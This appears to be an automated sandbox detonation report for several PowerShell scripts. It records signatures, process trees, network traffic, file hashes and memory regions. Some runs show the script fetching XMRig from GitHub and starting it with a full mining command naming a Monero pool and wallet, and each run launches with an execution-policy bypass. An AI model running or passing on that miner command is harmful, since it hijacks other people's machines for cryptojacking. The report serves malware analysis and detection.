powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=4024 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=996,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=4056 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

memory/4540-0-0x00007FF94B5A3000-0x00007FF94B5A5000-memory.dmp

memory/4540-1-0x000001DDC9B70000-0x000001DDC9B92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_diw4zaux.zei.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4540-11-0x00007FF94B5A0000-0x00007FF94C061000-memory.dmp

memory/4540-12-0x00007FF94B5A0000-0x00007FF94C061000-memory.dmp

memory/4540-13-0x00007FF94B5A0000-0x00007FF94C061000-memory.dmp

memory/4540-14-0x00007FF94B5A0000-0x00007FF94C061000-memory.dmp

memory/4540-15-0x00007FF94B5A0000-0x00007FF94C061000-memory.dmp

memory/4540-16-0x00007FF94B5A3000-0x00007FF94B5A5000-memory.dmp

memory/4540-17-0x00007FF94B5A0000-0x00007FF94C061000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:11

Platform

win10v2004-20240508-en

Max time kernel

1582s

Max time network

1591s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp

Files

memory/2236-0-0x00007FFCFA0A3000-0x00007FFCFA0A5000-memory.dmp

memory/2236-10-0x0000021B9B560000-0x0000021B9B582000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xndcpwrw.vnd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2236-11-0x00007FFCFA0A0000-0x00007FFCFAB61000-memory.dmp

memory/2236-12-0x00007FFCFA0A0000-0x00007FFCFAB61000-memory.dmp

memory/2236-13-0x0000021BB3B00000-0x0000021BB3D1C000-memory.dmp

memory/2236-14-0x00007FFCFA0A0000-0x00007FFCFAB61000-memory.dmp

memory/2236-15-0x00007FFCFA0A0000-0x00007FFCFAB61000-memory.dmp

memory/2236-17-0x00007FFCFA0A3000-0x00007FFCFA0A5000-memory.dmp

memory/2236-18-0x00007FFCFA0A0000-0x00007FFCFAB61000-memory.dmp

memory/2236-19-0x00007FFCFA0A0000-0x00007FFCFAB61000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:14

Platform

win11-20240508-en

Max time kernel

1651s

Max time network

1660s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/1436-0-0x00007FFE06133000-0x00007FFE06135000-memory.dmp

memory/1436-1-0x000002425C8E0000-0x000002425C902000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uuijxreg.sde.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1436-10-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp

memory/1436-11-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp

memory/1436-12-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp

memory/1436-13-0x00007FFE06133000-0x00007FFE06135000-memory.dmp

memory/1436-14-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 15:50

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 52.111.229.48:443 tcp

Files

memory/1352-0-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sygrxq5o.m5a.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1352-9-0x00000236F1A90000-0x00000236F1AB2000-memory.dmp

memory/1352-10-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/1352-11-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/1352-12-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/1352-14-0x00000236F20A0000-0x00000236F20B2000-memory.dmp

memory/1352-15-0x00000236F1F90000-0x00000236F1F9A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1800-46-0x0000018BB6450000-0x0000018BB6470000-memory.dmp

memory/1800-47-0x0000018BB64A0000-0x0000018BB64C0000-memory.dmp

memory/1800-48-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-53-0x0000018C4A400000-0x0000018C4A420000-memory.dmp

memory/1800-52-0x0000018C4A3E0000-0x0000018C4A400000-memory.dmp

memory/1800-49-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1352-51-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/1352-50-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp

memory/1800-54-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-55-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-56-0x0000018C4A3E0000-0x0000018C4A400000-memory.dmp

memory/1800-57-0x0000018C4A400000-0x0000018C4A420000-memory.dmp

memory/1800-58-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-59-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-60-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-61-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-62-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-63-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-64-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-65-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-66-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-67-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-68-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-69-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-70-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-71-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-72-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-73-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-74-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-75-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-76-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-77-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-78-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-79-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-80-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-81-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-82-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-83-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-84-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-85-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-86-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-87-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-88-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-89-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-90-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-91-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-92-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-93-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-94-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-95-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-96-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-97-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-98-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-99-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-100-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-101-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-102-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-103-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-104-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-105-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-106-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-107-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-108-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-109-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-110-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-111-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-112-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-113-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-114-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-115-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-116-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:11

Platform

win10v2004-20240508-en

Max time kernel

1755s

Max time network

1765s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp

Files

memory/2504-0-0x00007FFD85903000-0x00007FFD85905000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mzqadwub.jvw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2504-10-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp

memory/2504-11-0x000002087DC60000-0x000002087DC82000-memory.dmp

memory/2504-12-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp

memory/2504-13-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp

memory/2504-14-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp

memory/2504-15-0x00007FFD85903000-0x00007FFD85905000-memory.dmp

memory/2504-16-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp

memory/2504-17-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:17

Platform

win10v2004-20240508-en

Max time kernel

1727s

Max time network

1741s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp

Files

memory/3276-0-0x00007FFA94B33000-0x00007FFA94B35000-memory.dmp

memory/3276-1-0x0000022BEE440000-0x0000022BEE462000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cd4rylai.r3y.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3276-11-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/3276-12-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/3276-13-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/3276-14-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/3276-15-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/3276-16-0x00007FFA94B33000-0x00007FFA94B35000-memory.dmp

memory/3276-17-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:03

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1779s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 215.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp

Files

memory/3816-3-0x00007FFEF9163000-0x00007FFEF9164000-memory.dmp

memory/3816-5-0x00000227C4960000-0x00000227C4982000-memory.dmp

memory/3816-6-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp

memory/3816-9-0x00000227DCEB0000-0x00000227DCF26000-memory.dmp

memory/3816-10-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sa2whhed.bxu.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3816-25-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp

memory/3816-48-0x00000227DCE50000-0x00000227DCE62000-memory.dmp

memory/3816-61-0x00000227DCE30000-0x00000227DCE3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1672-90-0x0000015BDB2B0000-0x0000015BDB2D0000-memory.dmp

memory/1672-91-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/3816-92-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp

memory/3816-94-0x00007FFEF9163000-0x00007FFEF9164000-memory.dmp

memory/1672-93-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/3816-95-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp

memory/3816-96-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp

memory/1672-97-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-98-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-99-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-100-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-101-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-102-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

